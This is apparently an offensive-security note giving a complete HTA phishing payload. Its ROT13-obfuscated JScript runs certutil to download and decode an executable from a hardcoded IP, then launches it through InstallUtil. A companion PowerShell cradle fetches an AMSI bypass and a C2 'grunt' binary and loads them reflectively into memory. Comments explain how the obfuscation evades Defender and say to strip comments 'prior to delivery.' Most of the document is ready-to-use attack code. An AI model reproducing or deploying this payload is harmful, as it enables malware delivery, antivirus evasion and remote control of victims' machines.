HTA - embedded JavaScript
Create a binary to utilise with installutil, place the commands to run within the binary and compile. After compilation encode to a file (file.txt), using certutil -encode. The below script pulls file.txt, places it in c:\windows\tasks, decodes it back into an exe and then executes it with installutil.exe.
Within the compiled exe that is executed by installutil.exe place powershell commands that do something like bypass amsi and then reflectively load a grunt or shellcode embedded in a C# shellcode runner.
The obfuscation is simple but effective (ROT13):
note: may have to run twice to get full execution, if it needs to be run only once modify to have a sleep timer to allow the file.txt to be decoded.
cradle.ps1
(new-object system.net.webclient).downloadstring('http://192.168.0.20:8080/Amsi-Bypass.ps1') | IEX
$a=(new-object system.net.webclient).downloaddata('http://192.168.0.20:8080/modhttpgrunt.exe')
[System.Reflection.Assembly]::Load($a)
[Integral.Integral]::Execute()
hta_runner.hta
// Delete out comments prior to delivery
<!DOCTYPE html>
<html>
<head>
<title>HTA</title>
<meta http-equiv="x-ua-compatible" content="IE=edge" />
<script language="JScript">
var alph = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz".split("");
var ranalph = "NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm".split("");
var num = "0123456789".split("");
var sym = "/$:;-\\%#*&!. ".split("");
//certutil.exe -urlcache -split -f
var sample = " preghgvy.rkr -heypnpur -fcyvg -s ";
var scram = function(sample) {
var result = "";
for (var x=0; x<sample.length; x++) {
for (var y=0; y<alph.length; y++) {
if (sample[x]==alph[y]) {
result+=ranalph[y];
}
}
for (var s=0; s<sym.length; s++) {
if(sample[x]==sym[s]) {
result+=sym[s];
}
}
for (var n=0; n<num.length; n++) {
if(sample[x]==num[n]) {
result+=num[n];
}
}
}
return result.toString();
}
//stage 1 delivery
str1 = scram(sample);
//Wscript.shell
sample = "Jfpevcg.furyy";
wobj = scram(sample);
// 192.168.49.122:8080/file.txt C:\\Windows\\Tasks\\file.txt
sample = "192.168.49.122:8080/svyr.gkg P:\\Jvaqbjf\\Gnfxf\\svyr.gkg" //modify IP:PORT and payload as required;
str2 = scram(sample);
//http://
sample = "uggc://"
str3 = scram(sample);
//stage 2 setup
// certutil -decode C:\\Windows\\Tasks\\file.txt C:\\Windows\\Tasks\\bp.exe
sample = "preghgvy -qrpbqr P:\\Jvaqbjf\\Gnfxf\\svyr.gkg P:\\Jvaqbjf\\Gnfxf\\oc.rkr";
str4 = scram(sample);
//stage 3 execution
// C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U C:\\Windows\\Tasks\\bp.exe
sample = "P:\\Jvaqbjf\\Zvpebfbsg.ARG\\Senzrjbex64\\i4.0.30319\\VafgnyyHgvy.rkr /ybtsvyr= /YbtGbPbafbyr=snyfr /H P:\\Jvaqbjf\\Gnfxf\\oc.rkr";
str5 = scram(sample);
var ex = new ActiveXObject(wobj);
//%compspec% is an env var for cmd.exe, set t= sets an env variable containing the string http which defender was flagging on.
cmd = "%comspec% /v /c \"set t=" + str3 + "&&" + str1 + "!t!" + str2 + "\"";
cmd2 = str4;
cmd3 = str5;
//alert(cmd);
//alert(cmd2);
//alert(cmd3);
var deploy = ex.Run(cmd);
var deploy = ex.Run(cmd2);
var deploy = ex.Run(cmd3);
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>